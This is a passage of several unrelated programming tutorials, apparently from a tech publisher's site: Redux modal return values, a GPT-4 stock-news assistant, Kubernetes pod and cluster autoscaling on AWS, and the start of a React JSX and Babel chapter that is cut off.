We would probably want to use the ColorPicker in a variety of places and features within the UI, each needing to use the "result" color value in a different way, so having it dispatch a generic 'COLOR_SELECTED' action won't really suffice. We could include some kind of a callback function within the action, but that's an anti-pattern with Redux, because using non-serializable values in actions or state can break features like time-travel debugging. What we really need is a way to specify behavior specific to a feature, and use that from within the generic component. The answer that I came up with is to have the modal component accept a plain Redux action object as a prop. The component that requested the dialog be shown should specify that action as one of the props to be passed to the modal. When the modal is closed successfully, it should copy the action object, attach its "return value" to the action, and dispatch it. This way, different parts of the UI can use the "return value" of the generic modal in whatever specific functionality they need. Here's how the different pieces look: // In some arbitrary component: const onColorSelected = { type : 'FEATURE_SPECIFIC_ACTION', payload : { someFeatureSpecificData : 42, } }; this.props.dispatch({ type : 'SHOW_MODAL", payload : { modalType : "ColorPicker", modalProps : { initialColor : "red", // Include the pre-configured action object as a prop for the modal onColorSelected } } }); // In the ColorPicker component: handleOkClicked() { if(this.props.onColorSelected) { // If the code that requested this modal included an action object, // clone the action, attach our "return value", and dispatch it const clonedAction = _.clone(this.props.onColorSelected); clonedAction.payload.color = this.state.currentColor; this.props.dispatch(clonedAction); } this.props.hideModal(); } // In some reducer: function handleFeatureSpecificAction(state, action) { const {payload} = action; // Use the data provided by the original requesting code, as well as the // "return value" given to us by the generic modal component const {color, someFeatureSpecificData} = payload; return { ...state, [someFeatureSpecificData] : { ...state[someFeatureSpecificData], color } }; } This technique satisfies all the constraints for our problem. Any part of our application can request that a specific modal component be shown, without needing a nested component to "own" the modal. The display of the modal is driven by our Redux state. And most importantly, we can specify per-feature behavior and use "return values" from generic modals while keeping both our actions and our Redux state plain and serializable, ensuring that features like time-travel debugging still work correctly. About the author Mark Erikson is a software engineer living in southwest Ohio, USA, where he patiently awaits the annual heartbreak from the Reds and the Bengals. Mark is author of the Redux FAQ, maintains the React/Redux Links list and Redux Addons Catalog, and occasionally tweets at @acemarke. He can be usually found in the Reactiflux chat channels, answering questions about React and Redux. He is also slightly disturbed by the number of third-person references he has written in this bio!

AI for Investment

Louis Owen
12 Apr 2024
12 min read
Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights and books. Don't miss out – sign up today!IntroductionOne of the most important activities for an investor is to always keep up to date with the latest and relevant news. Usually, it’s done by reading at least a dozen news articles starting from macroeconomic issues, political issues, news related to the sector of the corresponding stock, analyst reports, and whatnot. This, of course, takes a lot of time and also sometimes can be overwhelming for new investors since the amount of information to be processed is too much.Many ML developers have tried to solve this issue by building a traditional ML workflow usually called the sentiment analyzer. This system will take text from the news as the input and return the sentiment score as the output. This is no doubt helpful for the investor, but it doesn’t solve the bigger problem which is the need to curate relevant articles and also knowing what’s the impact of each news toward their investment decision. In other words, it’s lacking of broader insight. What if there’s an AI assistant that can act as our personal investment news analyst? What if there’s an AI assistant that is able to analyze dozens of news articles and generate the insights summary along with the investment recommendation? And, what if I told you that this AI assistant is personalized toward your risk appetite and investment portfolio allocation? In this article, I’ll guide you on how to build an AI assistant that can do all the above-mentioned things with only a few lines of code - thanks to GPT4! We’ll discuss several ways to get the news data in bulk and in real-time. We’ll discuss what are the important search keywords we need to use to get relevant news data. We’ll also discuss how to construct the prompt to fulfill all of the above-mentioned criteria while also getting a great generated output. Finally, we’ll see how to put all of this together to build our AI assistant!Without wasting any more time, let’s take a deep breath, make yourselves comfortable, and be ready to learn how to build your personal AI investment news analyst!News Data SourcesGetting as much news data as possible is important since we don’t want to miss any important information out there. Once we get all the information, we just need to filter them out with the help of our AI assistant.SerpAPI is one of the best all-in-one scraping tools that we can utilize to get news data from Google, Yahoo, Bing, DuckDuckGo, and many other search engines. It also provides a free plan with a 100 searches/month limit. However, this limit is surely not enough for our use case. If you don’t mind spending some money and want to get multiple search results from different search engines, then this tool is suitable for you.Another solution that is more budget-friendly is by utilizing DuckDuckGo search engine API directly. DuckDuckGo is a search engine that offers data privacy as their main unique selling point. No search history will be stored. Moreover, they also open their search engine API for free. We will use DuckDuckGo in this article and learn how to utilize it via Python!The more effective way to widen our search results is actually not by using different search engines but by having a diverse yet mutually exclusive set of search keywords. 
The goal of our AI investment assistant is to summarize the important insights that are relevant to a particular stock that we're interested in. Hence, we need to provide relevant news data to be able to achieve our goal. The following are some of the search keywords that we can use. Note that this list is not exhaustive; you can surely expand the search keywords based on your own needs. We'll use AAPL as the ticker example. You can change it to any ticker you want.

$AAPL stock
$AAPL industry and competitors
$AAPL business model and strategy
$AAPL management and leadership

Besides ticker-specific search keywords, we can also search for more general information that is not ticker-specific. The following is an example list of such keywords.

economic growth this year
monetary and fiscal policies today
politics today
economy today
inflation rate today
interest rate today
real estate today

DuckDuckGo API

Once we have the keywords list, we can easily get the news data from DuckDuckGo via Python. First, we need to install the duckduckgo-search package by running the following command.

pip install duckduckgo-search

Once it is installed, we can create a general Python function that takes a search keyword as the input and returns a list of search results.

from duckduckgo_search import DDGS

ddgs = DDGS()

def web_search(query: str, num_results: int = 4, debug=True) -> list:
    """Useful for general internet search queries."""
    if debug:
        print("Searching with query {0}...".format(query))
    search_results = []
    if not query:
        return search_results
    results = ddgs.text(query)
    if not results:
        return search_results
    total_added = 0
    for j in results:
        search_results.append(j.get('body', ''))
        total_added += 1
        if total_added >= num_results:
            break
    return search_results

Using this function is very simple. We just need to pass the search keyword along with the number of search results to this function and get the list of search results back.

apple_competitors_news = web_search("$AAPL industry and competitors", num_results=10)

Prompt Engineering

The next important thing to do is to build our AI assistant. Here, we'll utilize GPT-4 to build our assistant. Since it's an LLM, we just need to provide the prompt without the need to train it from scratch. However, creating the prompt itself is indeed not an easy task. I have published another article regarding prompt engineering if you're interested in learning more about it.

Remember that the goal of our assistant is to analyze the provided news data dump and return the summary insights along with a recommendation as the output. However, to be able to give a recommendation, our assistant needs to know our risk appetite along with our portfolio condition. The following is an example of the system prompt that we can give to GPT-4.

system_prompt = """You are an expert in giving recommendation to BUY / SELL / HOLD for {} ({}). You can only return in JSON format with 5 fields: "Investment Thesis" (dictionary of string. Consist of elaborated decision reasoning (in bullet points) based on the risk profile of the investor, unrealized profit, and all of the factors as the basis of your recommendation. Provide numbers to justify your assertions, a lot ideally. The deeper the analysis the better.), "Investor Profiling" (dictionary of string. Connect the investment thesis with each of the investor profiles, including risk profile and unrealized profit.), "Summary Thesis" (string. Summary of all your investment thesis as the basis of the given recommendation. You have to take into account all factors in the investment thesis as well as the investor profiles.), "recommendation" ("BUY"/"SELL"/"HOLD")

In the investment thesis, please cover the following factors. If a particular factor needed to write the investment thesis does not exist, don't try to make up the answer, just write "The information needed is unavailable".
(1) Industry and Competitive Analysis: Assess the company's position within its industry and analyze industry trends, competition, barriers to entry, and market dynamics.
(2) News and Events: Stay updated on relevant news, earnings announcements, product launches, regulatory changes, and other events that can impact the company or the overall market.
(3) Market and Economic Conditions: Assess broader macroeconomic factors from news, including economic growth, interest rates, inflation, monetary and fiscal policies, geopolitical events, gold price, bond price, index price, real estate."""

And here's an example of the user prompt that consists of all the necessary data points. Risk profiles can be "Moderate", "Aggressive", or "Conservative".

user_prompt = """<INVESTOR PROFILE>
Risk Profile: {}
Unrealized Profit: {}%
{}"""

Putting It All Together

Now, we just need to create the main function that will act as our personal AI investment assistant.

def personal_investment_assistant(company_name: str, ticker: str, risk_profile: str, unrealized_profit_perc: float):
    news_data = []
    for search_keyword in search_kwrds_lst:
        news_data.extend(web_search(search_keyword))
    news_data = "\n".join(news_data)
    messages = [
        {
            "role": "system",
            "content": system_prompt.format(company_name, ticker)
        },
        {
            "role": "user",
            "content": user_prompt.format(risk_profile, unrealized_profit_perc, news_data)
        }
    ]
    response = get_gpt_response("gpt-4",
                                temperature=0.0,
                                messages=messages)
    return response["choices"][0]["message"]["content"].strip()

import requests
import json
import os

def get_gpt_response(model: str, temperature: float, messages: list):
    headers = {
        'content-type': "application/json",
        'Authorization': "Bearer " + os.environ["OPENAI_API_KEY"]
    }
    endpoint = 'https://api.openai.com/v1/chat/completions'
    data = json.dumps({
        "model": model,
        "messages": messages,
        "temperature": temperature,
    })
    try:
        data = requests.post(endpoint, data=data, headers=headers)
        openai_response = json.loads(data.text)
        return openai_response
    except Exception as e:
        print(e)
        return ""

Conclusion

Congratulations on keeping up to this point! Throughout this article, you have learned how to build your own personal AI investment analyst based on news data. You have learned how to get the news data, a list of useful search keywords, and the code implementation to build the AI assistant.
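As a final quick sketch of how you might call the assistant end to end, assuming the OPENAI_API_KEY environment variable is set and search_kwrds_lst holds the keywords built earlier (the argument values below are made up purely for illustration):

recommendation = personal_investment_assistant(
    company_name="Apple Inc.",
    ticker="AAPL",
    risk_profile="Moderate",
    unrealized_profit_perc=12.5
)
print(recommendation)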
Hope the best for your investment journey and see you in the next article!Author BioLouis Owen is a data scientist/AI engineer from Indonesia who is always hungry for new knowledge. Throughout his career journey, he has worked in various fields of industry, including NGOs, e-commerce, conversational AI, OTA, Smart City, and FinTech. Outside of work, he loves to spend his time helping data science enthusiasts to become data scientists, either through his articles or through mentoring sessions. He also loves to spend his spare time doing his hobbies: watching movies and conducting side projects. Currently, Louis is an NLP Research Engineer at Yellow.ai, the world’s leading CX automation platform. Check out Louis’ website to learn more about him! Lastly, if you have any queries or any topics to be discussed, please reach out to Louis via LinkedIn.

Implementing Horizontal Pod Autoscaling in Kubernetes [Tutorial]

Savia Lobo
18 Jul 2019
18 min read
When we use Kubernetes deployments to deploy our pod workloads, it is simple to scale the number of replicas used by our applications up and down using the kubectl scale command. However, if we want our applications to automatically respond to changes in their workloads and scale to meet demand, then Kubernetes provides us with Horizontal Pod Autoscaling. This article is an excerpt taken from the book Kubernetes on AWS written by Ed Robinson. In this book, you will start by learning about Kubernetes' powerful abstractions - Pods and Services - that make managing container deployments easy.  Horizontal Pod Autoscaling allows us to define rules that will scale the numbers of replicas up or down in our deployments based on CPU utilization and optionally other custom metrics. Before we are able to use Horizontal Pod Autoscaling in our cluster, we need to deploy the Kubernetes metrics server; this server provides endpoints that are used to discover CPU utilization and other metrics generated by our applications. In this article, you will learn how to use the horizontal pod autoscaling method to automatically scale your applications and to automatically provision and terminate EC2 instances. Deploying the metrics server Before we can make use of Horizontal Pod Autoscaling, we need to deploy the Kubernetes metrics server to our cluster. This is because the Horizontal Pod Autoscaling controller makes use of the metrics provided by the metrics.k8s.io API, which is provided by the metrics server. While some installations of Kubernetes may install this add-on by default, in our EKS cluster we will need to deploy it ourselves. There are a number of ways to deploy add-on components to your cluster: If you are using helm to manage applications on your cluster, you could use the stable/metrics server chart. For simplicity we are just going to deploy the metrics server manifests using kubectl. I like to integrate deploying add-ons such as the metrics server and kube2iam with the process that provisions the cluster, as I see them as integral parts of the cluster infrastructure. But if you are going to use a tool like a helm to manage deploying applications to your cluster, then you might prefer to manage everything running on your cluster with the same tool. The decision you take really depends on the processes you and your team adopt for managing your cluster and the applications that run on it. The metrics server is developed in the GitHub repository. You will find the manifests required to deploy it in the deploy directory of that repository. Start by cloning the configuration from GitHub. The metrics server began supporting the authentication methods provided by EKS in version 0.0.3 so make sure the manifests you have use at least that version. You will find a number of manifests in the deploy/1.8+ directory. The auth-reader.yaml and auth-delegator.yaml files configure the integration of the metrics server with the Kubernetes authorization infrastructure. The resource-reader.yaml file configures a role to give the metrics server the permissions to read resources from the API server, in order to discover the nodes that pods are running on. Basically, metrics-server-deployment.yaml and metrics-server-service.yaml define the deployment used to run the service itself and a service to be able to access it. 
Finally, the metrics-apiservice.yaml file defines an APIService resource that registers the metrics.k8s.io API group with the Kubernetes API server aggregation layer; this means that requests to the API server for the metrics.k8s.io group will be proxied to the metrics server service. Deploying these manifests with kubectl is simple, just submit all of the manifests to the cluster with kubectl apply: $ kubectl apply -f deploy/1.8+ You should see a message about each of the resources being created on the cluster. If you are using a tool like Terraform to provision your cluster, you might use it to submit the manifests for the metrics server when you create your cluster. Verifying the metrics server and troubleshooting Before we continue, we should take a moment to check that our cluster and the metrics server are correctly configured to work together. After the metrics server is running on your cluster and has had a chance to collect metrics from the cluster (give it a minute or so), you should be able to use the kubectl top command to see the resource usage of the pods and nodes in your cluster. Start by running kubectl top nodes. If you see output like this, then the metrics server is configured correctly and is collecting metrics from your nodes: $ kubectl top nodes NAME CPU(cores) CPU% MEMORY(bytes) MEMORY% ip-10-3-29-209 20m 1% 717Mi 19% ip-10-3-61-119 24m 1% 1011Mi 28% If you see an error message, then there are a number of troubleshooting steps you can follow. You should start by describing the metrics server deployment and checking that one replica is available: kubectl -n kube-system describe deployment metrics-server If it is not, you should debug the created pod by running kubectl -n kube-system describe pod. Look at the events to see why the server is not available. Make sure that you are running at least version 0.0.3 of the metrics server. If the metrics server is running correctly and you still see errors when running kubectl top, the issue is that the APIservice registered with the aggregation layer is not configured correctly. Check the events output at the bottom of the information returned when you run kubectl describe apiservice v1beta1.metrics.k8s.io. One common issue is that the EKS control plane cannot connect to the metrics server service on port 443. Autoscaling pods based on CPU usage Once the metrics server has been installed into our cluster, we will be able to use the metrics API to retrieve information about CPU and memory usage of the pods and nodes in our cluster. Using the kubectl top command is a simple example of this. The Horizontal Pod Autoscaler can also use this same metrics API to gather information about the current resource usage of the pods that make up a deployment. Let's look at an example of this; we are going to deploy a sample application that uses a lot of CPU under load, then configure a Horizontal Pod Autoscaler to scale up extra replicas of this pod to provide extra capacity when CPU utilization exceeds a target level. The application we will be deploying as an example is a simple Ruby web application that can calculate the nth number in the Fibonacci sequence, this application uses a simple recursive algorithm, and is not very efficient (perfect for us to experiment with autoscaling). The deployment for this application is very simple. 
It is important to set resource limits for CPU because the target CPU utilization is based on a percentage of this limit: deployment.yaml apiVersion: apps/v1 kind: Deployment metadata: name: fib labels: app: fib spec: selector: matchLabels: app: fib template: metadata: labels: app: fib spec: containers: - name: fib image: errm/fib ports: - containerPort: 9292 resources: limits: cpu: 250m memory: 32Mi We are not specifying a number of replicas in the deployment spec; when we first submit this deployment to the cluster, the number of replicas will therefore default to 1. This is good practice when creating a deployment where we intend the replicas to be adjusted by a Horizontal Pod Autoscaler, because it means that if we use kubectl apply to update the deployment later, we won't override the replica value the Horizonal Pod Autoscaler has set (inadvertently scaling the deployment down or up). Let's deploy this application to the cluster: kubectl apply -f deployment.yaml You could run kubectl get pods -l app=fib to check that the application started up correctly. We will create a service, so we are able to access the pods in our deployment, requests will be proxied to each of the replicas, spreading the load: service.yaml kind: Service apiVersion: v1 metadata: name: fib spec: selector: app: fib ports: - protocol: TCP port: 80 targetPort: 9292 Submit the service manifest to the cluster with kubectl: kubectl apply -f service.yaml We are going to configure a Horizonal Pod Autoscaler to control the number of replicas in our deployment. The spec defines how we want the autoscaler to behave; we have defined here that we want the autoscaler to maintain between 1 and 10 replicas of our application and achieve a target average CPU utilization of 60, across those replicas. When CPU utilization falls below 60%, then the autoscaler will adjust the replica count of the targeted deployment down; when it goes above 60%, replicas will be added: hpa.yaml kind: HorizontalPodAutoscaler apiVersion: autoscaling/v2beta1 metadata: name: fib spec: maxReplicas: 10 minReplicas: 1 scaleTargetRef: apiVersion: app/v1 kind: Deployment name: fib metrics: - type: Resource resource: name: cpu targetAverageUtilization: 60 Create the autoscaler with kubectl: kubectl apply -f hpa.yaml The kubectl autoscale command is a shortcut to create a HorizontalPodAutoscaler. Running kubectl autoscale deployment fib --min=1 --max=10 --cpu-percent=60 would create an equivalent autoscaler. Once you have created the Horizontal Pod Autoscaler, you can see a lot of interesting information about its current state with kubectl describe: $ kubectl describe hpa fib Name: fib Namespace: default CreationTimestamp: Sat, 15 Sep 2018 14:32:46 +0100 Reference: Deployment/fib Metrics: ( current / target ) resource cpu: 0% (1m) / 60% Min replicas: 1 Max replicas: 10 Deployment pods: 1 current / 1 desired Now we have set up our Horizontal Pod Autoscaler, we should generate some load on the pods in our deployment to illustrate how it works. In this case, we are going to use the ab (Apache benchmark) tool to repeatedly ask our application to compute the thirtieth Fibonacci number: load.yaml apiVersion: batch/v1 kind: Job metadata: name: fib-load labels: app: fib component: load spec: template: spec: containers: - name: fib-load image: errm/ab args: ["-n1000", "-c4", "fib/30"] restartPolicy: OnFailure This job uses ab to make 1,000 requests to the endpoint (with a concurrency of 4). 
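If you would rather drive the same load from your workstation instead of running the Job inside the cluster, a rough equivalent is to port-forward the fib service in one terminal and run ab against it in another. This is only a sketch; it assumes the sample app serves the Fibonacci index as the URL path, which is what the fib/30 argument above suggests:

kubectl port-forward service/fib 8080:80
ab -n 1000 -c 4 http://localhost:8080/30

Either way, the point is the same: sustained CPU-heavy requests push average utilization above the 60% target so you can watch the autoscaler react.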
Submit the job to the cluster, then observe the state of the Horizontal Pod Autoscaler: kubectl apply -f load.yaml watch kubectl describe hpa fib Once the load job has started to make requests, the autoscaler will scale up the deployment in order to handle the load: Name: fib Namespace: default CreationTimestamp: Sat, 15 Sep 2018 14:32:46 +0100 Reference: Deployment/fib Metrics: ( current / target ) resource cpu: 100% (251m) / 60% Min replicas: 1 Max replicas: 10 Deployment pods: 2 current / 2 desired Autoscaling pods based on other metrics The metrics server provides APIs that the Horizontal Pod Autoscaler can use to gain information about the CPU and memory utilization of pods in the cluster. It is possible to target a utilization percentage like we did for the CPU metric, or to target the absolute value as we have here for the memory metric: hpa.yaml kind: HorizontalPodAutoscaler apiVersion: autoscaling/v2beta1 metadata: name: fib spec: maxReplicas: 10 minReplicas: 1 scaleTargetRef: apiVersion: app/v1 kind: Deployment name: fib metrics: - type: Resource resource: name: memory targetAverageValue: 20M The Horizonal Pod Autoscaler also allows us to scale on other metrics provided by more comprehensive metrics systems. Kubernetes allows for metrics APIs to be aggregated for custom and external metrics. Custom metrics are metrics other than CPU and memory that are associated with a pod. You might for example use an adapter that allows you to use metrics that a system like Prometheus has collected from your pods. This can be very beneficial if you have more detailed metrics available about the utilization of your application, for example, a forking web server that exposes a count of busy worker processes, or a queue processing application that exposes metrics about the number of items currently enqueued. External metrics adapters provide information about resources that are not associated with any object within Kubernetes, for example, if you were using an external queuing system, such as the AWS SQS service.   On the whole, it is simpler if your applications can expose metrics about resources that they depend on that use an external metrics adapter, as it can be hard to limit access to particular metrics, whereas custom metrics are tied to a particular Pod, so Kubernetes can limit access to only those users and processes that need to use them. Autoscaling the cluster The capabilities of Kubernetes Horizontal Pod Autoscaler allow us to add and remove pod replicas from our applications as their resource usage changes over time. However, this makes no difference to the capacity of our cluster. If our pod autoscaler is adding pods to handle an increase in load, then eventually we might run out of space in our cluster, and additional pods would fail to be scheduled. If there is a decrease in the load on our application and the pod autoscaler removes pods, then we are paying AWS for EC2 instances that will sit idle. When we created our cluster in Chapter 7, A Production-Ready Cluster, we deployed the cluster nodes using an autoscaling group, so we should be able to use this to grow and shrink the cluster as the needs of the applications deployed to it change over time. Autoscaling groups have built-in support for scaling the size of the cluster, based on the average CPU utilization of the instances. 
This, however, is not really suitable when dealing with a Kubernetes cluster because the workloads running on each node of our cluster might be quite different, so the average CPU utilization is not really a very good proxy for the free capacity of the cluster. Thankfully, in order to schedule pods to nodes effectively, Kubernetes keeps track of the capacity of each node and the resources requested by each pod. By utilizing this information, we can automate scaling the cluster to match the size of the workload. The Kubernetes autoscaler project provides a cluster autoscaler component for some of the main cloud providers, including AWS. The cluster autoscaler can be deployed to our cluster quite simply. As well as being able to add instances to our cluster, the cluster autoscaler is also able to drain the pods from and then terminate instances when the capacity of the cluster can be reduced.   Deploying the cluster autoscaler Deploying the cluster autoscaler to our cluster is quite simple as it just requires a simple pod to be running. All we need for this is a simple Kubernetes deployment. In order for the cluster autoscaler to update the desired capacity of our autoscaling group, we need to give it permissions via an IAM role. If you are using kube2iam, we will be able to specify this role for the cluster autoscaler pod via an appropriate annotation: cluster_autoscaler.tf data "aws_iam_policy_document" "eks_node_assume_role_policy" { statement { actions = ["sts:AssumeRole"] principals { type = "AWS" identifiers = ["${aws_iam_role.node.arn}"] } } } resource "aws_iam_role" "cluster-autoscaler" { name = "EKSClusterAutoscaler" assume_role_policy = "${data.aws_iam_policy_document.eks_node_assume_role_policy.json}" } data "aws_iam_policy_document" "autoscaler" { statement { actions = [ "autoscaling:DescribeAutoScalingGroups", "autoscaling:DescribeAutoScalingInstances", "autoscaling:DescribeTags", "autoscaling:SetDesiredCapacity", "autoscaling:TerminateInstanceInAutoScalingGroup" ] resources = ["*"] } } resource "aws_iam_role_policy" "cluster_autoscaler" { name = "cluster-autoscaler" role = "${aws_iam_role.cluster_autoscaler.id}" policy = "${data.aws_iam_policy_document.autoscaler.json}" }   In order to deploy the cluster autoscaler to our cluster, we will submit a deployment manifest using kubectl. We will use Terraform's templating system to produce the manifest. We create a service account that is used by the autoscaler to connect to the Kubernetes API: cluster_autoscaler.tpl --- apiVersion: v1 kind: ServiceAccount metadata: labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler name: cluster-autoscaler namespace: kube-system The cluster autoscaler needs to read information about the current resource usage of the cluster, and needs to be able to evict pods from nodes that need to be removed from the cluster and terminated. Basically, cluster-autoscalerClusterRole provides the required permissions for these actions. 
The following is the code continuation for cluster_autoscaler.tpl: --- apiVersion: rbac.authorization.k8s.io/v1beta1 kind: ClusterRole metadata: name: cluster-autoscaler labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler rules: - apiGroups: [""] resources: ["events","endpoints"] verbs: ["create", "patch"] - apiGroups: [""] resources: ["pods/eviction"] verbs: ["create"] - apiGroups: [""] resources: ["pods/status"] verbs: ["update"] - apiGroups: [""] resources: ["endpoints"] resourceNames: ["cluster-autoscaler"] verbs: ["get","update"] - apiGroups: [""] resources: ["nodes"] verbs: ["watch","list","get","update"] - apiGroups: [""] resources: ["pods","services","replicationcontrollers","persistentvolumeclaims","persistentvolumes"] verbs: ["watch","list","get"] - apiGroups: ["extensions"] resources: ["replicasets","daemonsets"] verbs: ["watch","list","get"] - apiGroups: ["policy"] resources: ["poddisruptionbudgets"] verbs: ["watch","list"] - apiGroups: ["apps"] resources: ["statefulsets"] verbs: ["watch","list","get"] - apiGroups: ["storage.k8s.io"] resources: ["storageclasses"] verbs: ["watch","list","get"] --- apiVersion: rbac.authorization.k8s.io/v1beta1 kind: ClusterRoleBinding metadata: name: cluster-autoscaler labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole name: cluster-autoscaler subjects: - kind: ServiceAccount name: cluster-autoscaler namespace: kube-system Note that cluster-autoscaler stores state information in a config map, so needs permissions to be able to read and write from it. This role allows that. The following is the code continuation for cluster_autoscaler.tpl: --- apiVersion: rbac.authorization.k8s.io/v1beta1 kind: Role metadata: name: cluster-autoscaler namespace: kube-system labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler rules: - apiGroups: [""] resources: ["configmaps"] verbs: ["create"] - apiGroups: [""] resources: ["configmaps"] resourceNames: ["cluster-autoscaler-status"] verbs: ["delete","get","update"] --- apiVersion: rbac.authorization.k8s.io/v1beta1 kind: RoleBinding metadata: name: cluster-autoscaler namespace: kube-system labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler roleRef: apiGroup: rbac.authorization.k8s.io kind: Role name: cluster-autoscaler subjects: - kind: ServiceAccount name: cluster-autoscaler namespace: kube-system Finally, let's consider the manifest for the cluster autoscaler deployment itself. The cluster autoscaler pod contains a single container running the cluster autoscaler control loop. You will notice that we are passing some configuration to the cluster autoscaler as command-line arguments. Most importantly, the --node-group-auto-discovery flag allows the autoscaler to operate on autoscaling groups with the kubernetes.io/cluster/<cluster_name> tag. This is convenient because we don't have to explicitly configure the autoscaler with our cluster autoscaling group. If your Kubernetes cluster has nodes in more than one availability zone and you are running pods that rely on being scheduled to a particular zone (for example, pods that are making use of EBS volumes), it is recommended to create an autoscaling group for each availability zone that you plan to use. If you use one autoscaling group that spans several zones, then the cluster autoscaler will be unable to specify the availability zone of the instances that it launches. 
Here is the code continuation for cluster_autoscaler.tpl: --- apiVersion: extensions/v1beta1 kind: Deployment metadata: name: cluster-autoscaler namespace: kube-system labels: app: cluster-autoscaler spec: replicas: 1 selector: matchLabels: app: cluster-autoscaler template: metadata: annotations: iam.amazonaws.com/role: ${iam_role} labels: app: cluster-autoscaler spec: serviceAccountName: cluster-autoscaler containers: - image: k8s.gcr.io/cluster-autoscaler:v1.3.3 name: cluster-autoscaler resources: limits: cpu: 100m memory: 300Mi requests: cpu: 100m memory: 300Mi command: - ./cluster-autoscaler - --v=4 - --stderrthreshold=info - --cloud-provider=aws - --skip-nodes-with-local-storage=false - --expander=least-waste - --node-group-auto-discovery=asg:tag=kubernetes.io/cluster/${cluster_name} env: - name: AWS_REGION value: ${aws_region} volumeMounts: - name: ssl-certs mountPath: /etc/ssl/certs/ca-certificates.crt readOnly: true imagePullPolicy: "Always" volumes: - name: ssl-certs hostPath: path: "/etc/ssl/certs/ca-certificates.crt" Finally, we render the templated manifest by passing in the variables for the AWS region, cluster name and IAM role, and submitting the file to Kubernetes using kubectl: Here is the code continuation for cluster_autoscaler.tpl: data "aws_region" "current" {} data "template_file" " cluster_autoscaler " { template = "${file("${path.module}/cluster_autoscaler.tpl")}" vars { aws_region = "${data.aws_region.current.name}" cluster_name = "${aws_eks_cluster.control_plane.name}" iam_role = "${aws_iam_role.cluster_autoscaler.name}" } } resource "null_resource" "cluster_autoscaler" { trigers = { manifest_sha1 = "${sha1("${data.template_file.cluster_autoscaler.rendered}")}" } provisioner "local-exec" { command = "kubectl --kubeconfig=${local_file.kubeconfig.filename} apply -f -<<EOF\n${data.template_file.cluster_autoscaler.rendered}\nEOF" } } Thus, by understanding how Kubernetes assigns Quality of Service classes to your pods based on the resource requests and limits that you assign them, you can have precisely control how your pods are managed. By ensuring your critical applications, such as web servers and databases, run with the Guaranteed class, you can ensure that they will perform consistently and suffer minimal disruption when pods need to be rescheduled. If you have enjoyed reading this post, head over to our book, Kubernetes on AWS, for tips on deploying and managing applications, keeping your cluster and applications secure, and ensuring that your whole system is reliable and resilient to failure Low Carbon Kubernetes Scheduler: A demand side management solution that consumes electricity in low grid carbon intensity areas A vulnerability discovered in Kubernetes kubectl cp command can allow malicious directory traversal attack on a targeted system Kubernetes 1.15 releases with extensibility around core Kubernetes APIs, cluster lifecycle stability, and more!

Clean Up Your Code

Packt
19 Dec 2016
23 min read
 In this article by Michele Bertoli, the author of the book React Design Patterns and Best Practices, we will learn to use JSX without any problems or unexpected behaviors, it is important to understand how it works under the hood and the reasons why it is a useful tool to build UIs. Our goal is to write clean and maintainable JSX code and to achieve that we have to know where it comes from, how it gets translated to JavaScript and which features it provides. In the first section, we will do a little step back but please bear with me because it is crucial to master the basics to apply the best practices. In this article, we will see: What is JSX and why we should use it What is Babel and how we can use it to write modern JavaScript code The main features of JSX and the differences between HTML and JSX The best practices to write JSX in an elegant and maintainable way (For more resources related to this topic, see here.) JSX Let's see how we can declare our elements inside our components. React gives us two ways to define our elements: the first one is by using JavaScript functions and the second one is by using JSX, an optional XML-like syntax. In the beginning, JSX is one of the main reasons why people fails to approach to React because looking at the examples on the homepage and seeing JavaScript mixed with HTML for the first time does not seem right to most of us. As soon as we get used to it, we realize that it is very convenient exactly because it is similar to HTML and it looks very familiar to anyone who already created User Interfaces on the web. The opening and closing tags, make it easier to represent nested trees of elements, something that would have been unreadable and hard to maintain using plain JavaScript. Babel In order to use JSX (and es2015) in our code, we have to install Babel. First of all, it is important to understand clearly the problems it can solve for us and why we need to add a step in our process. The reason is that we want to use features of the language that have not been implemented yet in the browser, our target environment. Those advanced features make our code more clean for the developers but the browser cannot understand and execute it. So the solution is to write our scripts in JSX and es2015 and when we are ready to ship, we compile the sources into es5, the standard specification that is implemented in the major browsers today. Babel is a popular JavaScript compiler widely adopted within the React community: It can compile es2015 code into es5 JavaScript as well as compile JSX into JavaScript functions. The process is called transpilation, because it compiles the source into a new source rather than into an executable. Using it is pretty straightforward, we just install it: npm install --global babel-cli If you do not like to install it globally (developers usually tend to avoid it), you can install Babel locally to a project and run it through a npm script but for the purpose of this article a global instance is fine. When the installation is completed we can run the following command to compile our JavaScript files: babel source.js -o output.js One of the reasons why Babel is so powerful is because it is highly configurable. Babel is just a tool to transpile a source file into an output file but to apply some transformations we need to configure it. 
Luckily, there are some very useful presets of configurations which we can easily install and use: npm install --global babel-preset-es2015 babel-preset-react Once the installation is done, we create a configuration file called .babelrc and put the following lines into it to tell Babel to use those presets: { "presets": [ "es2015", "React" ] } From this point on we can write es2015 and JSX in our source files and execute the output files in the browser. Hello, World! Now that our environment has been set up to support JSX, we can dive into the most basic example: generating a div element. This is how you would create a div with React'screateElementfunction: React.createElement('div') React has some shortcut methods for DOM elements and the following line is equivalent to the one above: React.DOM.div() This is the JSX for creating a div element: <div /> It looks identical to the way we always used to create the markup of our HTML pages. The big difference is that we are writing the markup inside a .js file but it is important to notice that JSX is only a syntactic sugar and it gets transpiled into the JavaScript before being executed in the browser. In fact, our <div /> is translated into React.createElement('div') when we run Babel and that is something we should always keep in mind when we write our templates. DOM elements and React components With JSX we can obviously create both HTML elements and React components, the only difference is if they start with a capital letter or not. So for example to render an HTML button we use <button />, while to render our Button components we use <Button />. The first button gets transpiled into: React.createElement('button') While the second one into: React.createElement(Button) The difference here is that in the first call we are passing the type of the DOM element as a string while in the second one we are passing the component itself, which means that it should exist in the scope to work. As you may have noticed, JSX supports self-closing tags which are pretty good to keep the code terse and they do not require us to repeat unnecessary tags. Props JSX is very convenient when your DOM elements or React components have props, in fact following XML is pretty easy to set attributes on elements: <imgsrc="https://facebook.github.io/react/img/logo.svg" alt="React.js" /> The equivalent in JavaScript would be: React.createElement("img", { src: "https://facebook.github.io/react/img/logo.svg", alt: "React.js" }); Which is way less readable and even with only a couple of attributes it starts getting hard to be read without a bit of reasoning. Children JSX allows you to define children to 